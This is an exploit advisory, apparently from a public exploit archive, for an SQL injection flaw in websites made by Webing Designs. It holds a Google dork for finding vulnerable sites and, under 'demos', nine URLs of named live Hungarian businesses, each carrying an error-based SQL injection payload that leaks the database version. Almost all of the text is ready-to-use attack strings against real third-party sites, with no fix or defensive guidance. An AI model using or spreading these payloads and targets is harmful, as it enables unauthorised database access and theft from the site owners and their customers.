######################
# Exploit Title : Webing Designs SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://webing.hu/
# Google Dork : "Webáruház és közösségi portál készítés:"
# Date: 03 02 2016
# Tested On :Windows 7 /FireFox
######################
# demos and explanations:
#http://mhkk.hu/index.php?oldal=1&cikk=487'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://www.pizza-rendeles-miskolc.hu/?oldal=1&cikk=40'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://www.konkurenciaharc.hu/?oldal=1&cikk=86'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://www.drjuice.info/?oldal=1&cikk=487'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://www.donpedropizza.hu/?oldal=1&cikk=456'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://www.egeszsegesgyerekek.hu/?oldal=1&cikk=418'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://www.hbz.hu/?oldal=1&cikk=40'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://remaxhungary.com/?oldal=1&cikk=407'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
#http://www.deviltuning.hu/?oldal=1&cikk=40'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--
-
######################
# discovered by : Amir.ght
######################